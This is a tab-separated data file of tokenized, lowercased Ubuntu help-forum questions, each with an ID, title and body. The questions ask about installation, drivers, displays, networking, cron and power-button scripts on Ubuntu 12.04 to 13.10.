385701	if i install ubuntu linux on an external hard drive can i save the data on that same hard drive ?	i am planning on installing ubuntu on an external hard drive . my question is where does data get saved when i use this os ? for instance , if i create a folder on the desktop of ubuntu where is that information being saved ? ideally , i want all data related to my ubuntu os stored on the external driveâś is this possible ?
385702	in system information , smbus is marked red	from system information , i found something which was boxed and written in red . i copied the lines below . is it a problem ? because , my ralink rt3290 wireless card is not working and it is also marked like it . id : serial description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency = 0 resources : memory : c2605000-c26050ff ioport : 4040 ( size=32 )
385703	shift with right hand cursors produces numbers	i 've recently started using xfce and i 've noticed that whenever i edit text and i make a selection by holding down shift and using my cursor keys on the far right hand side of the keyboard it produces numbers , such as shift+down results in `` 2 '' [ 1 ] . i obviously do n't want this and i 'm to set in my way to start using the other cursor keys . i had the same problem with gnome many many years ago and was able to fix that . is there a configuration setting where i can alter this behavior ? [ 1 ] num-lock is always off on my keyboard .
385704	ubuntu and windows not working .	my computer says `` error , no such device found grub rescue > . '' how do i fix it ? i have an hp pavillion desktop pc . it was running windows 7 yesterday when i selected to install some `` important '' updates . after the said updates were installed , i restated the computer as prompted . after a while the computer just went off and said `` bootmgr missing '' and i ran ubuntu from an old live cd i had . i installed ubuntu into a 8 gb flash drive , and downloaded a windows 7 iso since i misplaced my cd . after downloading the iso i created a bootable usb with the iso to replace the cd i lost . i tried booting from my usb to load windows installation but it does n't work . now when i load up the pc it says that error message i put in the top . as for technical experience , i 'm mostly a windows , but i can use terminal in ubuntu too , as long as you directly spell out what i have to put in .
385705	skype and google+ on ubuntu 13.10	i am thinking about installing ubuntu 13.10 in my computer , but i am afraid because i must use vă­deo chat with skype ... i 've seen few pictures of someone 's image using skype , but does it really work easily ? and what about google+ ? thank you !
385706	/etc/acpi/powerbtn.sh for full shutdown menu ?	i 'm having the same problem as 13.10 : power button shuts down directly and ubuntu 13.10 with cinnamon desktop environment this answer seems to be the way to go , but i do n't know what the command is . my /etc/acpi/events/powerbtn calls /etc/acpi/powerbtn.sh which probably looks like everyone else 's : # ! /bin/sh # /etc/acpi/powerbtn.sh # initiates a shutdown when the power putton has been # pressed . [ -r /usr/share/acpi-support/power-funcs ] & & . /usr/share/acpi-support/power-funcs # getxuser gets the x user belonging to the display in $ displaynum . # if you want the foreground x user , use getxconsole ! getxuser ( ) { user=`pinky -fw | awk ' { if ( $ 2 == `` : ' $ displaynum ' '' || $ ( nf ) == `` : ' $ displaynum ' '' ) { print $ 1 ; exit ; } } '` if [ x '' $ user '' = x '' '' ] ; then startx=`pgrep -n startx` if [ x '' $ startx '' ! = x '' '' ] ; then user=`ps -o user -- no-headers $ startx` fi fi if [ x '' $ user '' ! = x '' '' ] ; then userhome=`getent passwd $ user | cut -d : -f6` export xauthority= $ userhome/.xauthority else export xauthority= '' '' fi export xuser= $ user } # skip if we just in the middle of resuming . test -f /var/lock/acpisleep & & exit 0 # if the current x console user is running a power management daemon that # handles suspend/resume requests , let them handle policy this is effectively # the same as 'acpi-support 's '/usr/share/acpi-support/policy-funcs ' file . [ -r /usr/share/acpi-support/power-funcs ] & & getxconsole pms= '' gnome-settings-daemon kpowersave xfce4-power-manager '' pms= '' $ pms guidance-power-manager.py dalston-power-applet '' pms= '' $ pms mate-settings-daemon '' if pidof x $ pms > /dev/null ; then exit elif test `` $ xuser '' ! = `` '' & & pidof dcopserver > /dev/null & & test -x /usr/bin/dcop & & /usr/bin/dcop -- user $ xuser kded kded loadedmodules | grep -q klaptopdaemon ; then exit elif test `` $ xuser '' ! = `` '' & & test -x /usr/bin/qdbus ; then kded4pid= $ ( pgrep -n -u $ xuser kded4 ) if test `` $ kded4pid '' ! = `` '' ; then dbusaddr= $ ( su - $ xuser -c `` grep -z dbus_session_bus_address /proc/ $ kded4pid/environ '' ) if test `` $ dbusaddr '' ! = `` '' & & su - $ xuser -c `` export $ dbusaddr ; qdbus org.kde.kded '' | grep -q powerdevil ; then exit fi fi fi # if all else failed , just initiate a plain shutdown . /sbin/shutdown -h now `` power button pressed '' mine seems to go to the last two lines every time , only shutting down : # if all else failed , just initiate a plain shutdown . /sbin/shutdown -h now `` power button pressed '' what script can bring up the logoff/shutdown/suspend menu like how it was in 13.04 ?
385708	audio without x	crosspost from /r/linuxquestions : i am trying to convert my ubuntu 12.04 desktop into a headless server and need everything running without x needing to start . i 've gotten the partitions to mount automatically , etc . but after changing the grub option , to : grub_cmdline_linux_default= '' text '' when i ssh into the server , there is no audio out . normally i can control it with mocp via ssh and use the mocp volume control . without x , there is no sound output . alsamixer wo n't run without sudo , but it looks like pulseaudio is already running ( tried rebooting ) . running alsamixer with sudo , confirms that all channels are turned up . i 'm sure i 'm missing a simple step here , but i ca n't think of what it is , can anybody offer some insight ? in addition , it was suggested that i try adding myself to the 'audio ' group . the groups output is : skycaptain adm dialout cdrom plugdev lpadmin admin sambashare running sudo usermod -a -g audio skycaptain does not change the output but returns no error edit : i 've discovered that playing audio as root does work as expected . adding myself to the audio group allows me to run alsamixer as regular user , but no channels are muted and the audio still does not work
385714	external monitor no longer recognized when connected vga , freezed computer when connected with hdmi	i 'm using 13.04 on a thinkpad x230 . i had routinely used a vga cable to plug in my external asus monitor . when entering the `` disply '' app , ubuntu would recognize it as `` ancor communications '' , and give appropriate resolution options . i set it on its side , set the display to clockwise , and used it as a vertical monitor for months without problems . all of a sudden , for no reason i can tell , it stops working . when i plug it in , it is no longer recognized as an `` ancor communications '' monitor , and it only gives me really coarse resolution options , which are useless . i fished out a hdmi cable and plugged that in . lo and behold it recognizes the brand of the monitor , and looks sharp and nice . but after about 5 minutes of being plugged in the computer starts to get reaaaaallllly slooooooow . i unplug and everything seems fine , but i have no external monitor . why did this break and how do i either make my external monitor recognizable through vga ( as it was before ) or not crash in hdmi ( which would be nice ) ? ? thanks for any help . i have no idea why this does n't just work as it did before . edit1 : added the bounty yesterday because i really want to fix this and i have no idea how to do it . i 'll award answers that both fix the problem and explain why the fix works . edit2 : here is the output of xrandr -q verbose screen 0 : minimum 320 x 200 , current 2134 x 1024 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( 0x4d ) normal ( normal left inverted right x axis y axis ) 277mm x 156mm identifier : 0x43 timestamp : 54199073 subpixel : horizontal rgb gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 0 crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff004ca3473000000000 00140103801c1078ea1d859156598f26 18505400000001010101010101010101 010101010101381d56d4500016303020 2500159c100000190000000f00000000 000000000025d9066a00000000fe0053 414d53554e470a204ca34154000000fe 004c544e31323541543031343031005d backlight : 15 range : ( 0 , 15 ) backlight : 15 range : ( 0 , 15 ) scaling mode : full aspect supported : nonefullcenterfull aspect 1366x768 ( 0x4d ) 74.8mhz -hsync -vsync *current +preferred h : width 1366 start 1414 end 1446 total 1578 skew 0 clock 47.4khz v : height 768 start 770 end 775 total 790 clock 60.0hz 1360x768 ( 0xb3 ) 84.8mhz -hsync +vsync h : width 1360 start 1432 end 1568 total 1776 skew 0 clock 47.7khz v : height 768 start 771 end 781 total 798 clock 59.8hz 1360x768 ( 0xb4 ) 72.0mhz +hsync -vsync h : width 1360 start 1408 end 1440 total 1520 skew 0 clock 47.4khz v : height 768 start 771 end 781 total 790 clock 60.0hz 1024x768 ( 0x4e ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0xb5 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0xb6 ) 36.0mhz +hsync +vsync h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0xb7 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz vga1 connected 768x1024+1366+0 ( 0x4e ) right ( normal left inverted right x axis y axis ) 0mm x 0mm identifier : 0x44 timestamp : 54199073 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 1 crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1024x768 ( 0x4e ) 65.0mhz -hsync -vsync *current h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0xb5 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0xb6 ) 36.0mhz +hsync +vsync h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 848x480 ( 0xb8 ) 33.8mhz +hsync +vsync h : width 848 start 864 end 976 total 1088 skew 0 clock 31.0khz v : height 480 start 486 end 494 total 517 clock 60.0hz 640x480 ( 0xb9 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 489 end 492 total 525 clock 59.9hz hdmi1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x45 timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon dp1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x46 timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon hdmi2 disconnected ( normal left inverted right x axis y axis ) identifier : 0x47 timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon hdmi3 disconnected ( normal left inverted right x axis y axis ) identifier : 0x48 timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon dp2 disconnected ( normal left inverted right x axis y axis ) identifier : 0x49 timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon dp3 disconnected ( normal left inverted right x axis y axis ) identifier : 0x4a timestamp : 54199073 subpixel : unknown clones : crtcs : 0 1 2 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : automatic supported : automaticfulllimited 16:235 audio : auto supported : force-dvioffautoon virtual1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x4b timestamp : 54199073 subpixel : no subpixels clones : crtcs : 3 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter :
385720	i am running knoppix on my desktop . how do i switch to ubuntu ?	probably a really simple solution , but i ca n't figure out how to install ubuntu onto a system running knoppix . i do n't want a dual boot , just want to replace knoppix with ubuntu . is there an easy way ?
385721	recovering photos from a formatted drive on ubuntu	i installed ubuntu on an old computer i had , which ran vista . i choose to do a clean install of ubuntu over the entire hdd . later on i found out that there were old precious photos on that hdd . is there anyway to recover these photos ?
385722	how to install amd graphics in ubuntu 13.10 in hp probook 440g1 with haswell integrated	i have hp probook 440g1 with integrated amd graphics ( mars ) ( discrete ) and intel core i7 haswell as integrated . i had installed ubuntu 13.10. but , by default the amd graphics was not installed . tried the method above , the unity desktop gets completely broken on reboot . two things happened while installing : - i downloaded the beta drivers from the amd site . after doing sudo ./amd_xxxxx.run , the amd gui came up , but , all the captions in the gui were missing only some buttons were visible , so i could not go ahead . i tried the way shown here ( http : //ubuntuforums.org/showthread.php ? t=1930450 ) , i could not install ia32-libs ( it seems the package is not available and gave some options , installed all the suggested options ) , everything went well , then when i did sudo aticonfig -- initial -f , it gave an error that fgrlx was not found in /usr/lib . so , the question is , in which ubuntu version can i completely support amd graphics of 8xxx variety . thanks in advance ! regards , manoj
385726	wacom bamboo cth-300 issues	i am running ubuntu 13.10 and am having issues with my wacom bamboo model cth-300 . the built in gui to configure wacom input devices does n't recognize my bamboo tablet at all . when i issue - dmesg | grep [ ww ] acom - my device is present however - lsmod | grep [ ww ] acom - returns nothing . i know that the module exists and i issue - sudo modprobe wacom - and add the driver , yet nothing changes . here is the terminal output : : ~ $ dmesg | grep [ ww ] acom [ 3.222071 ] usb 6-1 : manufacturer : wacom co. , ltd . : ~ $ lsmod | grep [ ww ] acom wacom 62341 0 and the full dmesg output : [ 1131.802099 ] usbcore : registered new interface driver wacom [ 1191.268404 ] usb 6-1 : usb disconnect , device number 2 [ 1193.073724 ] usb 6-1 : new full-speed usb device number 3 using ohci-pci [ 1193.247785 ] usb 6-1 : new usb device found , idvendor=056a , idproduct=0319 [ 1193.247804 ] usb 6-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1193.247813 ] usb 6-1 : product : bamboo pad , wireless [ 1193.247821 ] usb 6-1 : manufacturer : wacom co. , ltd . any input would be very helpful . thanks
385728	i ca n't enter to bios after i 've installed ubuntu 13.10	i having this problem . i 've installed ubuntu 13.10 and after this when booting only satars directly on ubuntu , if i want to boot from a usb flash drive i ca n't . so you can say `` go to the boot settings and select the usb as first in the priority menu '' . i 'll tell you : i 've instaled linux , windows and i did it thousand of times ! when i press f2 key ( in samsung is f2 ) i can not enter the boot menu . so i booted to ubuntu and deleted all the partitions ( with the exception of the system partition where ubuntu where running on ) . so i getted the same boot menu where the only option is ubuntu . i repeat : not the boot setting options , but the boot menu like in this video : http : //www.youtube.com/watch ? v=eptpymbny4o but i do n't have any options as in boot menu as in app menu ! i 've never seen a thing as this ! can anyone help me ? thanks !
385729	setup extender using my laptop ?	how can i recieve internet with wifi and spread it for another wifi gadgets ? i 'm using ubuntu 13.04 on asus n53sv laptop
385730	issue with ejabberd file permissions	i 'm running ubuntu 13.10 desktop . i installed ejabberd . i 'm trying to edit the /etc/ejabberd/ejabberd.cfg file , but get 'permission denied ' even though my id is in both the root and ejabberd user groups . what am i missing ? thank you in advance for any help with this issue .
385733	fix a broken desktop gui	i 've been running 12.04 on a nvidia gpu . i attempted to install ati 's proprietary catalyst drivers and a second gpu . now the x-desktop will not start . how do i refresh the borked desktop ? can nvidia and ati 's hd series coexist ? `` will not start '' may be a misnomer . the background comes up but the ( taskbar ? ) on the left does n't come up and the icons on the desktop ca n't be clicked . after a timeout i get a password request but then the desktop no longer shows . i found a message from modem-manager trying to start saying it ca n't find /var/run/dbus/system_bus_socket . that may or may not be helpful lspci : 03:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk106 [ geforce gtx 650 ti ] [ 10de:11c6 ] ( rev a1 ) subsystem : evga.com . corp. device [ 3842:3650 ] kernel driver in use : nvidia kernel modules : nvidia_319_updates , nvidia_304 , nvidia_304_updates , nouveau , ? nvidiafb 03:00.1 audio device [ 0403 ] : nvidia corporation gk106 hdmi audio controller [ 10de:0e0b ] ( rev a1 ) subsystem : evga.com . corp. device [ 3842:3650 ] 06:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] cedar [ radeon hd 5000/6000/7350/8350 series ] [ 1002:68f9 ] subsystem : hightech information system ltd. device [ 1787:2291 ] kernel modules : radeon 06:00.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] cedar hdmi audio [ radeon hd 5400/6300 series ] [ 1002 : aa68 ] subsystem : hightech information system ltd. device [ 1787 : aa68 ] kernel driver in use : snd_hda_intel
385734	cairo-dock dock launch issue	recently i installed cairo-dock , which is really good .but my main concern is everytime i want to lunch the dock , i need it to open through terminal.after launching i ca n't use terminal for any other purpose and also when i try to close terminal it will tell .. `` terminal is executing some process do you want to end '' and when i close the terminal .. dock also will get closed .now i need cairo-dock to work like all other app .i need to open the dock through gui , not through terminal.please help me out for this . ps : i am new to ubuntu , and i 'm using 12.04 .
385735	will there be gammu or wammu support for ubuntu phone os ?	will the ubuntu phone be able to integrate via usb/bluetooth so wammu/gammu like applications can be used ? it would be extremely nice to be able to text , talk , backup , update , and control your phone via pc interface in an office environment instead of having to split your attention between two devices . also , with this , you can probably save on your phone plan by using an internet connection via the pc instead of wasting valuable data . by the way , really looking forward to a real smart phone .
385737	can drivers create a problem while switching from 32 bit to 64 bits ?	i may sound like a noob , but i am going forward with it anyway.i have a windows xp 32 bit os .but my processor ( core 2 duo ) supports 64 bits .i want to install ubuntu.now my question is whether i should go for ubuntu 32 bit version or the 64 bit version.i already know their pros and cons . but i have heard that drivers or graphics may create a problem if i am switching from 32 bits to 64 bit os.is that true ? i do n't want to know the difference between the 32 bit and 64 bit os , but the technical glitches that may arise post installation .
385741	installing internet explorer but broken letters	i have ubuntu 12.04 and am trying to install ie because i can take online lectures and they 're only available on ie . i have virtualbox but from then , i do n't know what to do . i really need those lectures so i can study for my exams . chromium nor firefox do n't work with the website . they only show squares and question marks . when i installed ie , they said i need to install a plugin but i can not click them . plus , they do n't show my language , only either squares or numbers .
385742	how to completely remove kde plasma desktop	i 'm fairly new to the whole linux/ubuntu environment . i installed kde plasma desktop , but after about a week of using it i realized that i would rather stick with the unity desktop . my question is , how do i remove kde plasma desktop in one single sweep ? i could remove everything from the software center , but that 's to time consuming and it would n't rid me of all the desktop 's files .
385744	installing ubuntu to a laptop with ssd	i originally had a windows 8 operating system from which i tried to switch to linux via usb installation . my computer 's hard-drive became completely wiped out and the only thing that it would boot from was the ubuntu usb i had previously created . when i turn on my computer , it gives me the options of installing ubuntu or trying ubuntu . i installed ubuntu ( like i was supposed to ) and restarted my computer . my computer works well until i shut it down or take out the usb . then , my hard-drive is once again wiped out and the only thing i can do is plug in the usb and use it with the usb inside the computer . i 've attempted this several times , with different flash drives but nothing changes . i 'm using the ubuntu 12.04 lts 64 bit desktop my computer model is samsung ativ book 9 lite model np915s3g i 've attempted to go through the steps the ubuntu help by the boot repair ( https : //help.ubuntu.com/community/boot-repair ) then rebooted my computer . my computer still did n't boot to the os but now , every time i follow those same steps and reboot my computer it brings me back to this same account . secure boot is disabled the os selection is on csm and uefi os ahci mode control is manual ahci mode is disabled fast bios mode is off pxe oprom is off my system has a solid state drive ( ssd ) my bios version is p03rbv but i ca n't seem to find the uefi version the only options i have for boot option priorities are uefi : usb flash memorypmap and `` disabled '' please help , my computer has been like this for the past month .
385746	how to setup apt repository using dak ?	can anyone explain me how to setup a apt repository using dak ? we have one setup using preprepo which can only save one version of the file . any help would be appreciated .
385753	advantage of terminator over other terminal ?	is there any advantage of terminator over gnome-terminal or konsole ?
385755	wired networking issues 13.10 after 0-14 kernel update	i apologize if the subject of the question is redundant , but since it 's about very recent updates i 'm having trouble finding the solutions . running ubuntu 13.10 on .13 kernel : no network on boot , i must turn on router ( or off/on ) after log in then it works fine wired connection is detected but it 's stuck at getting ip address enabling connection at grub level does n't work either with the .14 ramdisk that upgraded yesterday there is no network connection at all . network settings shows no networks except for the standard proxy settings and restarting the router does n't help in this case . the only solution i tried was to albeit disable ipv6 connectivity since it seemed it could be the cause of some problems but that did nothing . when i boot into win . and on the android everything works , so a router settings problem is 99 % ruled out . any help is greatly appreciated , thanks
385759	does relinux support uefi ?	i need to install xnest and a few other things into an ubuntu 13.10 - desktop x86-64 live cd , but i have a uefi windows 8 laptop . i know that remastersys does n't support uefi , but i 'm wondering if relinux does ?
385761	network connection under virtualbox	i set up xp virtual machine in virtualbox under ubuntu12.04 amd64 arch . in network settings of xp in virtualbox , i use bridged . every time in ubuntu12.04 my internet connection was broken and reconnected , the xp virtual machine can not connect to internet . at that time i must shut down xp virtual machine and reopen it . it is so boring . how to make xp virtual machine not to restart to use bridged network when host machine connection reconnects ? thanks
385764	how do i force a reload of 13.10 ?	my first load of 13.10 is unstable . i think i had a bad internet connection . i changed my isp . how do i force a reload of 13.10 ?
385768	connect my galaxy s duos phone as mass storage or drivers	i want the drivers of my phone to be installed in ubuntu 12.04 lts please help me on this
385771	using ubuntu as a file server for retrieving documents pdfs etc	i have about 10000 pdfs stored in a windows pc now , i would like to use ubuntu to make it a file server and use a browser inter-phase to access or search for the documents from other windows pcs . does ubuntu have a file indexer like copernic or google desktop search . can anybody guide , how to do it .
385772	ipod manager to use under ubuntu 12.04	what is the most reliable ipod-managing software that exists for ubuntu 12.04 ? what is the most user-friendly ipod-managing software that exists for ubuntu 12.04 ?
385774	is re-installation of wireless driver necessary after updating linux headers every time ?	i updated my laptop with the recommended updates including the `` linux-header 3.8.0-34 '' . after installation , i noticed my wireless was not working . i began troubleshooting and nothing worked . finally i decided to re install the specific driver for my laptop using the fix from this post when i first installed ubuntu . it worked ! i am happy i got it to work again but my question is do i need to re-install the driver every time i make this kind of update on my system ? i 'm a bit frustrated with my recently purchased dell inspiron 7537 which has been giving me problems but i am wondering if this is a known issue for ubuntu or is it just another problem with my laptop ? ? ?
385775	looking for a gui for postfix/dovecot	ok , to be clear , i am not interested in web based guis . what i 'm making is something similar to the server administrator on windows , which is just a sort of control panel with the ability to install and configure various server functions or roles . what i 'm doing is creating it so that installing a `` role '' installs and configures all the needed packages for the services , and installs a frontend gui for easy configuration for non techy people who wont use cli . for example the web server role installs apache php fastcgi and rapache . the mail server role should install postfix , dovecot , a few others and a gui . what i am looking for is a gtk or qt type gui for postfix and or dovecot , similar to emma for db and rapache for web . thanks in advance . jl
385776	ca n't unmount dev/sda3 ( boot device )	please help a frustrated user . i currently run only ubuntu 12.04 : i cant seem to umount . i think the umount folder is lost . tried all possible measures to no avail . is there a way to force umount . i 've been stuck with this umount issues for days now . i 've already applied these but no luck : sudo umount /dev/sda3 i have equally tried umounting using gparted as well as utility : (
385780	dns issue with ip forwarding	i have an ubuntu box running ubuntu 12.04 lts server edition , which acts as a dhcp server and is also the gateway for my network . ip forwarding is turned on . additionally , the server acts as a secondary dns for websites i host . i am looking to install owncloud on the server , and that 's where my question arises . when i attempt an ssh connection to the server from behind the server , using its public ip address , the connection times out . i assume this is because it appears that my computer is using the same ip address , and that creates an issue at some point along the way . i 'm worried that installing owncloud on the server will produce the same issue . in other words , if i create a dns record for cloud.mydomain.com , that points to the server 's public ip address , then i worry that if i try and access cloud.mydomain.com from behind the server ( and thus , because of ip forwarding , appear to have the same ip address as the server ) , i simply wo n't get a proper response . if this is the case , how do i fix this ? thank you so much ! signed , spencer update : let me provide more information about the setup , as it may be relevant . the server has shorewall installed . all necessary ports are open . ip_forwarding in shorewall.conf is set to on . the server itself sits behind a nat . so it amounts to a nat within a nat . i know this is n't the best setup , but it 's what i 'm stuck working with . the dsl modem that generates the first nat is configured to forward all open ports ( in this case , 22 , 53 , and 80 ) to the server . the server provides dns for the outside world , and for my local network . today ( 12/5 ) i set up apache on the server , opened port 80 on both the server and the modem , and the problem persisted : i can access the default apache page from outside my network , but not from behind the server . any help you can provide would be much appreciated !
385781	amd catalyst control center not saving multi monitor settings	so i am using gksu amdcccle to make changes but for some reason whenever i select the 'multi-display desktop with display ( s ) ' option to extend my desktop the changes never save on restart or re-log . the odd thing is that other changes i make , like enabling tear free desktop seem to save and work fine . another thing , when i log out the user/password box is only on 1 screen with just a wallpaper on the other implying the extended display options are working correctly , but as soon as i log back in they go back to mirrored . i am on the proprietary fglrx drivers installed using the additional drivers method on ubuntu 13.10 with a hd 5870 . i am pretty new to linux , any help would be much appreciated . let me know if i left out some important information .
385783	extras for ubuntu 13.10	how can i download this file ?
385791	close any window via terminal without closing the program	i have my music player audacious to run at boot as soon as i log in ( startup program ) . however i do not want the window for the play to actually display , i just want it running in the system tray . i have checked audacious man page and there is no option to boot without the interface loaded . if there a command that i can add to my startup programs that will close only the window of audacious ? thanks -w
385793	cron running job multiple times	hello i have a cron job that i have setup , everything was working just fine until a couple of minutes ago when my cron job scheduled to only run every five hours started to run several processes every single minute . my cron job is specified as : * */5 * * * php -f [ path ] > /dev/null 2 > & 1 i am running ubuntu 13.10 64-bit .
385794	suspend uses 25-30 seconds to go to sleep	after upgrading to 13.10 , suspend takes approximately 28 seconds to complete , compared to 2-3 seconds earlier . when resuming , networking does not work and must be re-enabled by running sudo nmcli nm sleep false in the terminal . when suspending with the following command , the computer goes to sleep right away ( 2-3 seconds ) and networking works automatically after resume . does anyone else have the same problem ? i 've seen a lot of bug reports on suspend not working and networking not working after resume , but i still have n't found anyone else that has the same problem regarding the sleep delay .
385796	auto mount usb drives in ubuntu 12.04 lts server	i have a media server that is made from an allwell stb-6086 box . i have ubuntu 12.04 lts server `` non pae kernel '' installed on the box . as of right now my storage media is composed of 4 1tb external usb drives . i have a usb 2.0 pci card installed that does not work until the drivers for the os are loaded . i attempted to put the disk drives uuid into the fstab but get a error on boot as the drivers for the usb card loads after the fstab is read . the drives are mixed format of ext3 ntfs and exfat . i am working on moving all the formats over to ext3 for this project as the disk drives will no longer be moved around . i need to know how to auto mount the usb drives once the drivers for the usb card is loaded . i have searched to my wits end trying to solve this but no avail ! thanks for you help sam
385797	convert unmouted ext ( boot device ) dev/sda3 to ntfs	is it possible to convert unmouted ext ( boot device ) dev/sda3 to ntfs ? if so how to do ? i already tried using gparted with no luck .
385800	gnome is not loading gui just as unity	hi am sammy and am using ubuntu 12.10 version.i installed gnome due to unity loading problems.this worked for a week the the nightmare begun.gnome too is not loading and its just showing the wallpaper.i use hp compaq d220 mt ( its a little old ) .the last notable event was editing the gnome tweaks.then it have being consequently giving me the error that ubuntu is expiriencing internal problems please restart computer
385801	wired internet going in and out	i am connected to a wired ethernet connection in 13.10 and the connection is constantly going out , sending the notification `` disconnected you are now offline '' and then almost immediately reconnects me this is really annoying and it makes downloading anything impossible . does anyone know how to help ?
385802	intel 4965agn - unable to connect wireless	i recently installed ubuntu 12.04.3 on dell xps m1330 laptop and i am not able to connect to internet at all . wireless adapter : intel 4965 agn wireless adapter router : asus rt-ac66u i have tried following setups and nothing helped : 1 ) updated both ubuntu and router firmaware 2 ) disable network security then also unable to connect . i am sometimes able to connect to 5ghz channel ( different ssid ) but it is extremely slow . i am hoping to migrate from windows to linux but without internet connection i ca n't . any ideas ? thanks
385803	13.04 startup problem ( read-only and usb 4-4 issues )	i am having alot of trouble getting my system to boot . i have to go into grub , enable read-write by getting the network connect and then resuming . the system : running ubuntu 13.04 on acer v3-551g-x419 . usb device 00:10.0 usb controller : advanced micro devices [ amd ] fch usb xhci controller ( rev 03 ) ( prog-if 30 [ xhci ] ) 00:12.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) 00:12.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) 00:13.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) 00:13.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) graphics card 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9900 ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt [ radeon hd 7670m ] ( prog-if 00 [ vga control errors from kern.log usb 4-4 : new full-speed usb device number 3 using ohci_hcd linux video capture interface : v2.00 usb 4-4 : string descriptor 0 read error : -22 usb 4-4 : new usb device found , idvendor=0489 , idproduct=e04e usb 4-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 how do i stop getting this error ? it takes about 15 minutes to login everytime through grub network , reboot , grub resume ... thankyou for any help !
385810	realtek 8192 worked before at my buddy 's house but when i brought my computer home the device wo n't connect to my internet	me and my buddy accidentally deleted my windows 7 off my computer so we decided to put ubuntu 13.10 3.11.0-12 generic on instead while at his place we were able to connect to the internet . i had this usb connector on the windows operating system and it came with a cd for the installation process when i put the ubuntu on it connected right away . but when i brought my computer home and attempted to connect to the internet it recognizes that the internet is there but nothing happens . when i punch in the password it just acts like it wants to connect but wo n't . i have gone through a few of these questions and once have worked and i have no clue what the hell i 'm doing . please tell me what i can do to get it working i 'm bored not being able to connect to the internet . so how to fix this ? would very much like to have something to do at night besides just starring at the damn snow outside my window so all help will be greatly appreciated .
385811	ubuntu 13.10 installation on sony vaio	i want to install ubuntu 13.10 on my sony vaio-sve15125 along side windows 8 , so can you guys please tell me if amd radeonâ˘ hd 7650m is supported with this version of ubuntu ? as i have faced issues regarding installation with the previous version of ubuntu 13.04 resulting to a purple splash screen on bootup and the installation never went further . so please help me out with this . thanks and regards riz
